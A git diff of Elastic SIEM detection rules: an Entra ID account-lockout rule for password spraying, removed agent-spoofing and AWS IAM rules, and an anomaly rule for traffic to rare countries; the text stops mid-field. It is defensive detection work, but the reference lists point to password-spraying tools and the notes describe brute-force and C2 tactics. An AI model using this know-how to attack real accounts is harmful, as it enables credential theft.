"Elastic" + ], + "description": "Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials or have misconfigured authentication settings may lead to false positives." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-azure.signinlogs-*" + ], + "interval": "30m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Entra ID Excessive Account Lockouts Detected", + "note": "## Triage and analysis\n\n### Investigating Microsoft Entra ID Excessive Account Lockouts Detected\n\nThis rule detects a high number of sign-in failures due to account lockouts (error code `50053`) in Microsoft Entra ID sign-in logs. These lockouts are typically caused by repeated authentication failures, often as a result of brute-force tactics such as password spraying, credential stuffing, or automated guessing. This detection is time-bucketed and aggregates attempts to identify bursts or coordinated campaigns targeting multiple users.\n\n### Possible investigation steps\n\nPlease note this is as threshold rule that aggregates multiple account lockouts over a specified time window. To properly investigate, pivot into the individual sign-in log events that contributed to the threshold being met.\n\n- Review users impacted by pivoting searching for `user.name` in events where `azure.signinlogs.properties.status.error_code` is `50053`.\n- Analyze source addresses associated with these lockouts. Identify whether the activity originated from known malicious infrastructure (e.g., VPNs, botnets, or public cloud providers).\n- Inspect the user-agents involved in these account lockouts. Clients like `Python Requests` indicate scripted automation rather than legitimate login attempts. ROPC agents may suggest brute-forcing against legacy auth.\n- A high ratio suggests distributed attacks across multiple accounts, characteristic of password spraying.\n- Correlate client apps associated such as PowerShell or unattended sign-in clients may be targeted for automation or legacy auth bypass.\n- Review conditional access state or risk state of the user involved. If Conditional Access was not applied and risk was not flagged, policy scope or coverage should be reviewed.\n- Check for any successful sign-ins for the affected users around the same time frame to determine if any accounts were compromised prior to lockout.\n\n### False positive analysis\n\n- Misconfigured clients, scripts, or services with outdated credentials may inadvertently cause lockouts.\n- Repeated lockouts from known internal IPs or during credential rotation windows could be benign.\n- Legacy applications without modern auth support may repeatedly fail and trigger Smart Lockout.\n- Specific known user agents (e.g., corporate service accounts).\n- Internal IPs or cloud-hosted automation with expected failure behavior.\n\n### Response and remediation\n\n- Investigate locked accounts immediately. Confirm if the account was successfully accessed prior to lockout.\n- Reset credentials for impacted users and enforce MFA before re-enabling accounts.\n- Block malicious IPs or ASN at the firewall, identity provider, or Conditional Access level.\n- Audit authentication methods in use, and enforce modern auth (OAuth, SAML) over legacy protocols.\n- Strengthen Conditional Access policies to reduce exposure from weak locations, apps, or clients.\n- Conduct credential hygiene audits to assess reuse and rotation for targeted accounts.\n- If false positives are identified, create exceptions for known benign sources, users or user agents to reduce noise.\n", + "query": "event.dataset: \"azure.signinlogs\" and event.category: \"authentication\"\n and azure.signinlogs.category: (\"NonInteractiveUserSignInLogs\" or \"SignInLogs\")\n and event.outcome: \"failure\"\n and azure.signinlogs.properties.authentication_requirement: \"singleFactorAuthentication\"\n and azure.signinlogs.properties.status.error_code: 50053\n and azure.signinlogs.properties.user_principal_name: (* and not \"\")\n and not source.as.organization.name: \"MICROSOFT-CORP-MSN-as-BLOCK\"\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/", + "https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying", + "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", + "https://www.sprocketsecurity.com/blog/exploring-modern-password-spraying", + "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", + "https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes", + "https://github.com/0xZDH/Omnispray", + "https://github.com/0xZDH/o365spray" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.22.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.signinlogs.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_requirement", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.status.error_code", + "type": "integer" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.user_principal_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.as.organization.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2d6f5332-42ea-11f0-b09a-f661ea17fbcd", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + }, + { + "id": "T1110.004", + "name": "Credential Stuffing", + "reference": "https://attack.mitre.org/techniques/T1110/004/" + } + ] + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "user.name", + "value": 15 + } + ], + "field": [], + "value": 20 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 106 + }, + "id": "2d6f5332-42ea-11f0-b09a-f661ea17fbcd_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_2.json deleted file mode 100644 index 32c56f658c7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_2.json +++ /dev/null @@ -1,81 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials or have misconfigured authentication settings may lead to false positives." - ], - "from": "now-60m", - "interval": "15m", - "language": "esql", - "license": "Elastic License v2", - "name": "Microsoft Entra ID Exccessive Account Lockouts Detected", - "note": "## Triage and analysis\n\n### Investigating Microsoft Entra ID Exccessive Account Lockouts Detected\n\nThis rule detects a high number of sign-in failures due to account lockouts (error code `50053`) in Microsoft Entra ID sign-in logs. These lockouts are typically caused by repeated authentication failures, often as a result of brute-force tactics such as password spraying, credential stuffing, or automated guessing. This detection is time-bucketed and aggregates attempts to identify bursts or coordinated campaigns targeting multiple users.\n\n### Possible investigation steps\n\n- Review `user_id_list` and `user_principal_name`: Check if targeted users include high-value accounts such as administrators, service principals, or shared inboxes.\n- Check `error_codes` and `result_description`: Validate that `50053` (account locked) is the consistent failure type. Messages indicating \"malicious IP\" activity suggest Microsoft\u2019s backend flagged the source.\n- Analyze `ip_list` and `source_orgs`: Identify whether the activity originated from known malicious infrastructure (e.g., VPNs, botnets, or public cloud providers). In the example, traffic originates from `MASSCOM`, which should be validated.\n- Inspect `device_detail_browser` and `user_agent`: Clients like `\"Python Requests\"` indicate scripted automation rather than legitimate login attempts.\n- Evaluate `unique_users` vs. `total_attempts`: A high ratio suggests distributed attacks across multiple accounts, characteristic of password spraying.\n- Correlate `client_app_display_name` and `incoming_token_type`: PowerShell or unattended sign-in clients may be targeted for automation or legacy auth bypass.\n- Review `conditional_access_status` and `risk_state`: If Conditional Access was not applied and risk was not flagged, policy scope or coverage should be reviewed.\n- Validate time range (`first_seen`, `last_seen`): Determine whether the attack is a short burst or part of a longer campaign.\n\n### False positive analysis\n\n- Misconfigured clients, scripts, or services with outdated credentials may inadvertently cause lockouts.\n- Repeated lockouts from known internal IPs or during credential rotation windows could be benign.\n- Legacy applications without modern auth support may repeatedly fail and trigger Smart Lockout.\n- Specific known user agents (e.g., corporate service accounts).\n- Internal IPs or cloud-hosted automation with expected failure behavior.\n\n### Response and remediation\n\n- Investigate locked accounts immediately. Confirm if the account was successfully accessed prior to lockout.\n- Reset credentials for impacted users and enforce MFA before re-enabling accounts.\n- Block malicious IPs or ASN at the firewall, identity provider, or Conditional Access level.\n- Audit authentication methods in use, and enforce modern auth (OAuth, SAML) over legacy protocols.\n- Strengthen Conditional Access policies to reduce exposure from weak locations, apps, or clients.\n- Conduct credential hygiene audits to assess reuse and rotation for targeted accounts.\n", - "query": "from logs-azure.signinlogs*\n\n| eval\n Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp),\n Esql_priv.azure_signinlogs_properties_user_principal_name_lower = to_lower(azure.signinlogs.properties.user_principal_name),\n Esql.azure_signinlogs_properties_incoming_token_type_lower = to_lower(azure.signinlogs.properties.incoming_token_type),\n Esql.azure_signinlogs_properties_app_display_name_lower = to_lower(azure.signinlogs.properties.app_display_name)\n\n| where event.dataset == \"azure.signinlogs\"\n and event.category == \"authentication\"\n and azure.signinlogs.category in (\"NonInteractiveUserSignInLogs\", \"SignInLogs\")\n and event.outcome == \"failure\"\n and azure.signinlogs.properties.authentication_requirement == \"singleFactorAuthentication\"\n and azure.signinlogs.properties.status.error_code == 50053\n and azure.signinlogs.properties.user_principal_name is not null\n and azure.signinlogs.properties.user_principal_name != \"\"\n and source.`as`.organization.name != \"MICROSOFT-CORP-MSN-as-BLOCK\"\n\n| stats\n Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement),\n Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id),\n Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name),\n Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id),\n Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name),\n Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status),\n Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser),\n Esql.azure_signinlogs_properties_device_detail_device_id_values = values(azure.signinlogs.properties.device_detail.device_id),\n Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system),\n Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type),\n Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state),\n Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id),\n Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id),\n Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name),\n Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description),\n Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature),\n Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type),\n\n Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct = count_distinct(Esql_priv.azure_signinlogs_properties_user_principal_name_lower),\n Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values = values(Esql_priv.azure_signinlogs_properties_user_principal_name_lower),\n Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description),\n Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code),\n Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code),\n Esql.azure_signinlogs_properties_incoming_token_type_lower_values = values(Esql.azure_signinlogs_properties_incoming_token_type_lower),\n Esql.azure_signinlogs_properties_app_display_name_lower_values = values(Esql.azure_signinlogs_properties_app_display_name_lower),\n Esql.source_ip_values = values(source.ip),\n Esql.source_ip_count_distinct = count_distinct(source.ip),\n Esql.source_as_organization_name_values = values(source.`as`.organization.name),\n Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name),\n Esql.source_geo_country_name_values = values(source.geo.country_name),\n Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name),\n Esql.@timestamp.min = min(@timestamp),\n Esql.@timestamp.max = max(@timestamp),\n Esql.event_count = count()\nby Esql.time_window_date_trunc\n\n| where Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 15 and Esql.event_count >= 20\n\n| keep\n Esql.time_window_date_trunc,\n Esql.event_count,\n Esql.@timestamp.min,\n Esql.@timestamp.max,\n Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct,\n Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values,\n Esql.azure_signinlogs_result_description_count_distinct,\n Esql.azure_signinlogs_result_description_values,\n Esql.azure_signinlogs_properties_status_error_code_count_distinct,\n Esql.azure_signinlogs_properties_status_error_code_values,\n Esql.azure_signinlogs_properties_incoming_token_type_lower_values,\n Esql.azure_signinlogs_properties_app_display_name_lower_values,\n Esql.source_ip_values,\n Esql.source_ip_count_distinct,\n Esql.source_as_organization_name_values,\n Esql.source_as_organization_name_count_distinct,\n Esql.source_geo_country_name_values,\n Esql.source_geo_country_name_count_distinct,\n Esql.azure_signinlogs_properties_authentication_requirement_values,\n Esql.azure_signinlogs_properties_app_id_values,\n Esql.azure_signinlogs_properties_app_display_name_values,\n Esql.azure_signinlogs_properties_resource_id_values,\n Esql.azure_signinlogs_properties_resource_display_name_values,\n Esql.azure_signinlogs_properties_conditional_access_status_values,\n Esql.azure_signinlogs_properties_device_detail_browser_values,\n Esql.azure_signinlogs_properties_device_detail_device_id_values,\n Esql.azure_signinlogs_properties_device_detail_operating_system_values,\n Esql.azure_signinlogs_properties_incoming_token_type_values,\n Esql.azure_signinlogs_properties_risk_state_values,\n Esql.azure_signinlogs_properties_session_id_values,\n Esql.azure_signinlogs_properties_user_id_values,\n Esql_priv.azure_signinlogs_properties_user_principal_name_values,\n Esql.azure_signinlogs_result_description_values,\n Esql.azure_signinlogs_result_signature_values,\n Esql.azure_signinlogs_result_type_values\n", - "references": [ - "https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/", - "https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying", - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://www.sprocketsecurity.com/blog/exploring-modern-password-spraying", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 73, - "rule_id": "2d6f5332-42ea-11f0-b09a-f661ea17fbcd", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - }, - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "2d6f5332-42ea-11f0-b09a-f661ea17fbcd_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_211.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_211.json index a9518a92cd4..4db2c1c6805 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_211.json +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_211.json @@ -21,7 +21,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_102.json b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_102.json deleted file mode 100644 index b1e9e077e1a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_102.json +++ /dev/null @@ -1,57 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects events that have a mismatch on the expected event agent ID. The status \"agent_id_mismatch/mismatch\" occurs when the expected agent ID associated with the API key does not match the actual agent ID in an event. This could indicate attempts to spoof events in order to masquerade actual activity to evade detection.", - "false_positives": [ - "This is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the necessary field, resulting in false positives." - ], - "from": "now-9m", - "index": [ - "logs-*", - "metrics-*", - "traces-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Agent Spoofing - Mismatched Agent ID", - "query": "event.agent_id_status:(agent_id_mismatch or mismatch)\n", - "required_fields": [ - { - "ecs": true, - "name": "event.agent_id_status", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "3115bd2c-0baa-4df0-80ea-45e474b5ef93", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1036", - "name": "Masquerading", - "reference": "https://attack.mitre.org/techniques/T1036/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 102 - }, - "id": "3115bd2c-0baa-4df0-80ea-45e474b5ef93_102", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32d3ad0e-6add-11ef-8c7b-f661ea17fbcc_8.json b/packages/security_detection_engine/kibana/security_rule/32d3ad0e-6add-11ef-8c7b-f661ea17fbcc_8.json index 3b50992154a..39f93c3a3b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/32d3ad0e-6add-11ef-8c7b-f661ea17fbcc_8.json +++ b/packages/security_detection_engine/kibana/security_rule/32d3ad0e-6add-11ef-8c7b-f661ea17fbcc_8.json @@ -40,7 +40,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_209.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_209.json deleted file mode 100644 index 8eba4cd4b2f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_209.json +++ /dev/null @@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the addition of a user to a specified group in AWS Identity and Access Management (IAM).", - "false_positives": [ - "Adding users to a specified group may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. User additions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM User Addition to Group", - "note": "## Triage and analysis\n\n### Investigating AWS IAM User Addition to Group\n\nAWS Identity and Access Management (IAM) provides fine-grained access control across all of AWS. With IAM, you can specify who can access which services and resources, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to ensure least-privilege permissions.\n\nThis rule looks for the addition of users to a specified user group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher confidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions \u2014 to reduce noise from onboarding processes and administrator activities.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:AddUserToGroup and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "333de828-8190-4cf5-8d7c-7575846f6fe0", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "333de828-8190-4cf5-8d7c-7575846f6fe0_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35f86980-1fb1-4dff-b311-3be941549c8d_108.json b/packages/security_detection_engine/kibana/security_rule/35f86980-1fb1-4dff-b311-3be941549c8d_108.json new file mode 100644 index 00000000000..f28869308a5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35f86980-1fb1-4dff-b311-3be941549c8d_108.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected a rare destination country name in the network logs. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, when a user clicks on a link in a phishing email or opens a malicious document, a request may be sent to download and run a payload from a server in a country which does not normally appear in network traffic or business work-flows. Malware instances and persistence mechanisms may communicate with command-and-control (C2) infrastructure in their country of origin, which may be an unusual destination country for the source network.", + "false_positives": [ + "Business workflows that occur very occasionally, and involve a business relationship with an organization in a country that does not routinely appear in network events, can trigger this alert. A new business workflow with an organization in a country with which no workflows previously existed may trigger this alert - although the model will learn that the new destination country is no longer anomalous as the activity becomes ongoing. Business travelers who roam to many countries for brief periods may trigger this alert." + ], + "from": "now-30m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "rare_destination_country", + "name": "Network Traffic to Rare Destination Country", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Network Traffic to Rare Destination Country\n\nMachine learning models analyze network logs to identify traffic to uncommon destination countries, which may indicate malicious activities like unauthorized access or data exfiltration. Adversaries exploit this by directing traffic to servers in atypical locations, often linked to command-and-control operations. The detection rule flags such anomalies, aiding in early threat identification and response.\n\n### Possible investigation steps\n\n- Review the network logs to identify the specific destination country flagged as rare and assess its historical presence in the network traffic.\n- Analyze the source IP addresses and user accounts associated with the flagged traffic to determine if they are legitimate or potentially compromised.\n- Investigate the nature of the traffic, such as the protocols and ports used, to identify any unusual patterns or connections to known malicious infrastructure.\n- Check for any recent phishing attempts or suspicious emails that may have led to the initiation of this traffic, focusing on links or attachments that could have been used to download malicious payloads.\n- Correlate the flagged traffic with any other security alerts or incidents to identify potential patterns or coordinated attacks involving the rare destination country.\n- Consult threat intelligence sources to determine if the destination country or specific IP addresses are associated with known threat actors or command-and-control servers.\n\n### False positive analysis\n\n- Legitimate business communications with partners or clients in rare destination countries may trigger alerts. Users should review and whitelist these known entities to prevent future false positives.\n- Routine software updates or patches from international vendors might be flagged. Identify and exclude these update servers from the detection rule to avoid unnecessary alerts.\n- Employees traveling abroad and accessing company resources can generate alerts. Implement a process to temporarily whitelist these destinations based on travel schedules.\n- Cloud services with global data centers may route traffic through uncommon countries. Verify the service's IP ranges and exclude them if they are part of normal operations.\n- Research or market expansion activities targeting new regions might cause alerts. Document and exclude these activities if they align with business objectives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Conduct a thorough scan of the isolated system for malware or unauthorized software, focusing on identifying any command-and-control (C2) communication channels.\n- Block network traffic to and from the identified rare destination country at the firewall or proxy level to prevent further communication with potential malicious servers.\n- Review and analyze logs from the affected system and network devices to identify any additional indicators of compromise or related suspicious activities.\n- If malware is detected, remove it using appropriate tools and techniques, ensuring that all persistence mechanisms are eradicated.\n- Restore the affected system from a clean backup if necessary, ensuring that all security patches and updates are applied.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "risk_score": 21, + "rule_id": "35f86980-1fb1-4dff-b311-3be941549c8d", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Network Packet Capture\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Network Packet Capture Integration Setup\nThe Network Packet Capture integration sniffs network packets on a host and dissects known protocols. Monitoring the network traffic is critical to gaining observability and 